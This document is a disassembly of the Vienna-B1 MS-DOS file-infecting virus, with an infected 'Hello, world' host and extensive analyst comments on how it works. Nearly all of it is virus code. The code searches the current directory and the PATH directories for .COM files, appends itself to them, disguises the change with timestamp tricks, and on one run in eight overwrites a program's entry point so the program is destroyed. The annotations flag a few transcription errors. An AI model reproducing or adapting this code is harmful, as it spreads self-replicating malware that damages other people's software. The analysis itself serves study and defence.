MalwareSourceCode/MSDOS/V-Index/Virus.MSDOS.Unknown.viennaas.asm

; disassembly of vienna-b1 virus
;
; ---------------------------------------------------------------------------
; Analyst annotation (comments only; every instruction below is as found).
;
; What this is: a debugger-style listing of a "Hello, world" .COM program
; that has been infected by Vienna-B1.  16-bit real mode, CS=DS=ES=SS, image
; loaded at offset 0100h.  It is NOT clean NASM: segment overrides appear as
; a bare "es" prefix, one immediate lacks its "h" suffix (the "mov ax,4301"
; before the open), and the tail of the file (after label3) is a raw byte
; dump.  Treat it as reading material, not as something to assemble.
;
; Infection mechanics, as established by the DOS calls below:
;   * the body is 288h (648) bytes, 0119h..03A0h in this image, and is
;     appended to the end of each victim (int 21h/40h at label18);
;   * the victim's first 3 bytes are saved (read at label18, kept at
;     variables+0Ah) and replaced by "E9 rel16", a near jump to the appended
;     body (rel16 = file size - 3, so the target is offset 100h + size);
;   * all state lives in a variable area addressed from SI (0312h in this
;     image); the imm16 of "mov dx,0312h" at label1 is re-patched per victim
;     to (file size + 2F9h) before the body is written out;
;   * candidates are *.COM in the current directory, then in each PATH=
;     directory read from the environment block (segment at PSP:002Ch);
;   * a candidate is skipped when the seconds field of its timestamp is
;     already 1Fh (the marker written back at label19) or its size (low word
;     only) is below 0Ah or above 0FA00h bytes; 0FA00h + 100h + 288h = 0FD88h,
;     so the appended body still fits the 64K segment;
;   * read-only is cleared before the open; attributes, date and time are put
;     back afterwards (except the marker);
;   * payload: when the current seconds value (DH from int 21h/2Ch) has its
;     low 3 bits clear, the first 5 bytes of the candidate are overwritten
;     with a far jump (bytes at 039Ch in the dump) instead of infecting it,
;     which wrecks that program.
;
; Variable area layout (offsets from SI, i.e. from 0312h here):
;   +00h word  saved DTA offset          +02h word  saved DTA segment
;   +04h word  victim's file time        +06h word  victim's file date
;   +08h word  victim's file attributes
;   +0Ah 3 bytes  victim's original first 3 bytes (restored to 0100h at start)
;   +0Dh 3 bytes  "E9 rel16" written to victim offset 0 (+0Eh is the rel16)
;   +10h 6 bytes  "*.COM",0 search pattern
;   +16h word  pointer into the PATH= text (0 = no directories left)
;   +18h word  end of the directory prefix inside the filename buffer
;   +1Ah 5 bytes  "PATH=" search key      +1Fh  ASCIIZ filename buffer
;   +5Fh  private DTA for FindFirst/FindNext (+75h = DTA+16h file time,
;         +79h = DTA+1Ah size low word, +7Dh = DTA+1Eh found name)
;   +8Ah 5 bytes  far jump used by the destructive branch
;   -1F9h  first byte of the body (where the 288h-byte write starts)
;   -1F7h  imm16 of "mov dx,...." at label1 (re-patched per victim)
; ---------------------------------------------------------------------------
jmp label1 ;E9 16 00: the stub the virus wrote over the host's first 3 bytes
message:
db "ello, world!$" ;---- host program: the original .COM file ----
 ;the 'H' of "Hello, world!$" was the third byte the stub
 ;overwrote (the saved bytes at 031Ch are EB 0E 48)
mov ah,09h ;DOS print string
mov dx,message ;ds:dx -> "$"-terminated text
int 21h
int 20h ;terminate; the host only runs after the virus RETs to 0100h
label1:
push cx ;kept for the host, restored at label3
mov dx,0312h ;variable base; this imm16 (at 011Bh) is patched per victim
cld ;string ops count upward
mov si,dx ;si = variable base
add si,000Ah ;variables+0Ah = host's original first 3 bytes
mov di,0100h ;put them back where the E9 stub sits
mov cx,0003 ;three bytes
repz movsb
mov si,dx ;si = variable base for the rest of the body
mov ah,30h ;get DOS version
int 21h
cmp al,00h ;AL=0 is what DOS 1.x returns (no handle functions)
jnz label2 ;DOS 2+: go infect
jmp label3 ;DOS 1.x: skip straight to the host
label2:
push es ;int 21h/2Fh returns the DTA in ES:BX
mov ah,2fh ;get current DTA address
int 21h
mov [si+0000h],bx ;variables+00h = DTA offset
mov [si+0002],es ;variables+02h = DTA segment
pop es
mov dx,005fh ;private DTA lives at variables+5Fh
nop
add dx,si ;ds:dx -> new DTA
mov ah,1ah ;set DTA address
int 21h
push es ;saved across the environment scan
push si
mov es,[002ch] ;ES = environment segment, from the PSP
mov di,0000h ;scan the environment from its start
label4:
pop si ;si = variable base (re-read on every retry)
push si
add si,001ah ;variables+1Ah = "PATH="
lodsb ;al = 'P'
mov cx,8000h ;scan up to 8000h bytes of the environment for it
repnz scasb ;NOTE(review): no end-of-environment check; the only way
 ;out of this scan is a match, so a block without PATH=
 ;keeps DI walking through the segment
mov cx,0004h ;then the next 4 bytes must be "ATH="
label7:
lodsb ;next key byte
scasb ;compare with the environment byte at es:di
jnz label4 ;mismatch: rescan from the current DI
loop label7
pop si ;si = variable base
pop es ;ES = PSP segment again
mov [si+0016h],di ;variables+16h = environment offset just past "PATH="
mov di,si ;(these two are overwritten two lines down)
add di,001fh
mov bx,si ;bx = variable base (label5 addresses through BX)
add si,001fh
mov di,si ;di = variables+1Fh = filename buffer (no directory prefix yet)
jmp label5 ;first pass searches the current directory
label13: ;no (more) matches in this directory
cmp word ptr [si+0016h],00h ;any PATH= directories left?
 ;NOTE(review): as labelled, a nonzero pointer jumps back to label5 and
 ;re-issues the same FindFirst, so the search would never advance; the
 ;directory-advance code at "push ds" below has no label and is otherwise
 ;unreachable.  That code is almost certainly the intended target (label
 ;lost in transcription).
jnz label5
jmp label6 ;PATH= exhausted: restore the DTA and run the host
push ds
push si
es mov ds,[002ch] ;DS = environment segment (ES: override; ES is the PSP segment here)
mov di,si ;di = variable base
es mov si,[di+0016h] ;si = current PATH= offset, read through ES (the PSP segment)
add di,001fh ;di = filename buffer
label10: ;copy one directory entry of PATH= into the buffer
lodsb ;next PATH= byte (ds = environment)
cmp al,3bh ;';' ends this directory
jz label8
cmp al,00h ;NUL ends the whole PATH= string
jz label9
stosb ;es:di is the filename buffer (es = PSP segment)
jmp label10
label9:
mov si,0000h ;0 = no directories left
label8:
pop bx ;bx = variable base
pop ds ;DS = PSP segment again
mov [bx+0016h],si ;variables+16h = start of the next directory (or 0)
cmp byte ptr [di-01h],5ch ;prefix already ends in '\'?
jz label5
mov al,5ch ;no: append one
stosb
label5: ;search <prefix>*.COM
mov [bx+0018h],di ;variables+18h = where a found name will be appended
mov si,bx
add si,0010h ;variables+10h = "*.COM",0
mov cx,0006h ;6 bytes, NUL included
repz movsb
mov si,bx ;si = variable base
mov ah,4eh ;FindFirst
mov dx,001fh ;ds:dx = variables+1Fh, the ASCIIZ file spec
nop
add dx,si
mov cx,0003h ;attribute mask: read-only and hidden files are included
int 21h
jmp label11
label14:
mov ah,4fh ;FindNext
int 21h
label11:
jnb label12 ;CF clear: a file was found
jmp label13 ;CF set: nothing (more) here, try the next PATH= directory
label12: ;candidate found; its directory entry is in the private DTA
mov ax,[si+0075h] ;DTA+16h: file time of the match
and al,1fh ;seconds/2 field
cmp al,1fh ;1Fh is the infection marker written at label19
jz label14 ;already infected: next match
cmp word ptr [si+0079h],0fa00h ;DTA+1Ah: size low word (high word ignored)
ja label14 ;too big: next match
cmp word ptr [si+0079h],0ah
jb label14 ;too small: next match
mov di,[si+0018h] ;append the found name after the directory prefix
push si
add si,007dh ;DTA+1Eh: ASCIIZ name of the match
label15:
lodsb
stosb
cmp al,00h ;copy through the NUL
jnz label15
pop si ;si = variable base
mov ax,4300h ;get file attributes
mov dx,001fh ;ds:dx = full ASCIIZ path in the filename buffer
nop
add dx,si
int 21h
mov [si+0008h],cx ;variables+08h = original attributes
mov ax,4301 ;set file attributes
 ;NOTE(review): no 'h' suffix here; as written this is decimal 4301 =
 ;10CDh, not AX=4301h.  Evidently a transcription slip, since the next
 ;two lines only make sense for the set-attributes call.
and cx,0fffeh ;clear read-only so the open for writing succeeds
mov dx,001fh
nop
add dx,si
int 21h
mov ax,3d02h ;open for read/write (handle)
mov dx,001fh
nop
add dx,si
int 21h
jnb label16 ;open succeeded
jmp label17 ;open failed: just put the attributes back
label16:
mov bx,ax ;bx = file handle
mov ax,5700h ;get file date and time
int 21h
mov [si+0004],cx ;variables+04h = time
mov [si+0006],dx ;variables+06h = date
mov ah,2ch ;get system time: DH = seconds
int 21h
and dh,07h ;seconds multiple of 8 (1 in 8 chance)?
jnz label18 ;no: infect
mov ah,40h ;yes: destructive branch, write 5 bytes at offset 0
mov cx,0005h ;(the file pointer is still 0 right after the open)
mov dx,si
add dx,008ah ;variables+8Ah = far-jump bytes (039Ch in the dump)
int 21h
jmp label19 ;restamp, mark and close; nothing appended
nop
label18: ;infect the open file
mov ah,3fh ;read
mov cx,0003h ;the victim's first 3 bytes
mov dx,000ah ;into variables+0Ah (they become part of the written body)
nop
add dx,si
int 21h
jb label19 ;read error: give up on this file
cmp ax,0003h ;must have read exactly 3
jnz label19
mov ax,4202h ;seek relative to end of file
mov cx,0000h ;offset 0 -> DX:AX = file size, AX = low word
mov dx,0000h
int 21h
jb label19
mov cx,ax ;cx = size
sub ax,0003h ;rel16 for the E9 stub: 3 + (size-3) = size = body start
mov [si+000eh],ax ;patch into the stub at variables+0Dh
add cx,02f9h ;new variable base in the victim = 100h + size + 1F9h
mov di,si
sub di,01f7h ;variables-1F7h = imm16 of "mov dx,...." at label1
mov [di],cx ;patch it before the body is copied
mov ah,40h ;write
mov cx,0288h ;the whole body, 288h bytes ...
mov dx,si
sub dx,01f9h ;... starting at variables-1F9h (0119h here), appended at EOF
int 21h
jb label19
cmp ax,0288h ;all 288h bytes written?
jnz label19
mov ax,4200h ;seek to offset 0
mov cx,0000h
mov dx,0000h
int 21h
jb label19
mov ah,40h ;write the 3-byte stub over the victim's entry point
mov cx,0003h
mov dx,si
add dx,000dh ;variables+0Dh = E9 rel16
int 21h
label19: ;restamp the file and close it
mov dx,[si+0006h] ;original date
mov cx,[si+0004h] ;original time ...
and cx,0ffe0h ;... with the seconds field forced to 1Fh:
or cx,001fh ;the "already infected" marker checked at label12
mov ax,5701h ;set file date and time
int 21h
mov ah,3eh ;close handle
int 21h
label17: ;put the original attributes back
mov ax,4301h ;set file attributes
mov di,[si+0008h] ;NOTE(review): 4301h takes the attribute word in CX, but the
 ;saved value is loaded into DI here; CX still holds the time
 ;word from label19 (or the masked attributes, on the failed
 ;open path).  Likely a transcription slip for "mov cx,[si+0008h]".
mov dx,001fh ;ds:dx = ASCIIZ path
nop
add dx,si
int 21h
label6: ;restore the caller's DTA
push ds
mov ah,1ah ;set DTA address
mov dx,[si+0000] ;saved offset
mov ds,[si+0002] ;saved segment
int 21h
pop ds
label3: ;hand control to the host at 0100h
pop cx ;CX as on entry
xor ax,ax ;scrub the other registers
xor bx,bx
xor dx,dx
xor si,si
mov di,0100h ;host entry point (its original 3 bytes were restored at label1)
push di ;push it so the RET below jumps there
xor di,di
ret 0ffffh ;pops 0100h into IP; the FFFFh operand then adds -1 to SP.
 ;The original author marked this '?': a plain RET (C3) is the
 ;evident intent, and C2 FF FF may be a disassembly artifact.
; ---------------------------------------------------------------------------
; Variable area and private DTA (0312h..03A0h) as a raw debugger dump.
; The mnemonics in this region are a disassembler's misreading of data
; bytes; only the hex column carries meaning.  From 0364h on the dump shows
; a "1463:" segment prefix -- same addresses, a different debugger session.
; This image is the 25-byte hello-world host itself: the DTA entry at 0371h
; names DANGER!.COM with size 00000019h, and 0019h - 3 = 0016h is exactly
; the rel16 of the "E9 16 00" stub at 031Fh (body at 0100h + 19h = 0119h,
; variables at 19h + 2F9h = 0312h).  Offsets below are relative to SI=0312h.
; ---------------------------------------------------------------------------
start_of_variables:
0312 80003E ADD BYTE PTR [BX+SI],3E ;+00h: saved DTA offset 0080h (the default DTA in the PSP); 0314h starts +02h
0315 40 inc ax ;+02h: saved DTA segment 403Eh -- presumably a stale value from the run that infected this file
0316 D592 AAD 92 ;+04h: file time 92D5h (same as the DTA entry at 0387h)
0318 8511 TEST dx,[BX+DI] ;+06h: file date 1185h (same as the DTA entry at 0389h)
031A 2000 AND [BX+SI],AL ;+08h: attributes 0020h (archive)
031C EB0E JMP 032ch ;+0Ah: host's original first 3 bytes EB 0E 48 = "jmp short 0110h" ...
;(copied back to 0100h at label1; 0110h is the host's "mov ah,09h")
031E 48 DEC ax ;... and 'H', the first letter of "Hello, world!$"
031F E91600 JMP 0338 ;+0Dh: "E9 16 00" stub written to the victim's offset 0; rel16 patched at label18
db "*.COM" ;+10h: search pattern (0322h..0326h)
0327 0027 ADD [BX],ah ;0327h: NUL of "*.COM"; 0328h: low byte of +16h
0329 0022 ADD [BP+SI],ah ;+16h = 0027h (PATH= pointer); 032Ah: low byte of +18h
032B 03 ;+18h = 0322h -- pointer values presumably left over from the infecting run's layout
db "PATH=DANGER!.COM EM.COM" ;the original author's reading of 032Ch..0343h (see the bytes below)
032C 5041 ADD dx,[BX+SI+41] ;+1Ah: "PATH=" search key, 032Ch..0330h
032E 54 push SP
032F 48 DEC ax
0330 3D4441 cmp ax,4144 ;'=' ends the key; 0331h = +1Fh filename buffer: "DANGER!.COM",0
0333 4E DEC SI
0334 47 inc DI
0335 45 inc BP
0336 52 push dx
0337 212E434F AND [4F43],BP
033B 4D DEC BP
033C 00454D ADD [DI+4D],AL ;033Ch: NUL terminator; 033Dh..0343h "EM.COM",0 -- presumably the tail of an earlier, longer name
033F 2E CS:
0340 43 inc BX
0341 4F DEC DI
0342 4D DEC BP
0343 0000 ADD [BX+SI],AL
0345 43 inc BX ;0345h..0347h "COM": more leftover buffer contents
0346 4F DEC DI
0347 4D DEC BP
0348 0020 ADD [BX+SI],ah ;0348h NUL; 0349h..0370h are 20h (spaces) up to the end of the buffer area
034A 2020 AND [BX+SI],ah
034C 2020 AND [BX+SI],ah
034E 2020 AND [BX+SI],ah
0350 2020 AND [BX+SI],ah
0352 2020 AND [BX+SI],ah
0354 2020 AND [BX+SI],ah
0356 2020 AND [BX+SI],ah
0358 2020 AND [BX+SI],ah
035A 2020 AND [BX+SI],ah
035C 2020 AND [BX+SI],ah
035E 2020 AND [BX+SI],ah
0360 2020 AND [BX+SI],ah
0362 2020 AND [BX+SI],ah
1463:0364 2020 AND [BX+SI],ah ;dump format changes here (segment prefix shown); addresses continue
1463:0366 2020 AND [BX+SI],ah
1463:0368 2020 AND [BX+SI],ah
1463:036A 2020 AND [BX+SI],ah
1463:036C 2020 AND [BX+SI],ah
1463:036E 2020 AND [BX+SI],ah
1463:0370 2003 AND [BP+DI],AL ;0370h: last space; 0371h = +5Fh private DTA, byte 0 = 03h (drive)
1463:0372 3F AAS ;DTA+01h..0Bh: search template "????????COM" (what FindFirst derives from *.COM)
1463:0373 3F AAS
1463:0374 3F AAS
1463:0375 3F AAS
1463:0376 3F AAS
1463:0377 3F AAS
1463:0378 3F AAS
1463:0379 3F AAS
1463:037A 43 inc BX
1463:037B 4F DEC DI
1463:037C 4D DEC BP
1463:037D 0305 ADD ax,[DI] ;DTA+0Ch..14h: DOS-private search state
1463:037F 001F ADD [BX],BL
1463:0381 0020 ADD [BX+SI],ah
1463:0383 64 DB 64
1463:0384 7269 JB 03EF
1463:0386 20D5 AND CH,DL ;DTA+15h: attribute 20h; 0387h = DTA+16h (+75h) file time, low byte
1463:0388 92 XCHG dx,ax ;time = 92D5h; low 5 bits 15h, i.e. not yet marked 1Fh
1463:0389 8511 TEST dx,[BX+DI] ;DTA+18h: date 1185h
1463:038B 1900 SBB [BX+SI],ax ;DTA+1Ah (+79h): size 00000019h = 25 bytes
1463:038D 0000 ADD [BX+SI],AL
1463:038F 44 inc SP ;DTA+1Eh (+7Dh): found name "DANGER!.COM",0
1463:0390 41 inc cx
1463:0391 4E DEC SI
1463:0392 47 inc DI
1463:0393 45 inc BP
1463:0394 52 push dx
1463:0395 212E434F AND [4F43],BP
1463:0399 4D DEC BP
1463:039A 0000 ADD [BX+SI],AL ;NUL terminator and one pad byte
1463:039C EA0B021358 JMP 5813:020B ;+8Ah: the 5-byte far jump the destructive branch writes over a victim's
;entry point (where 5813:020B lands is not determinable from this listing;
;the effect is that the program no longer starts its own code).
;03A0h is the last byte of the 288h-byte body that label18 writes.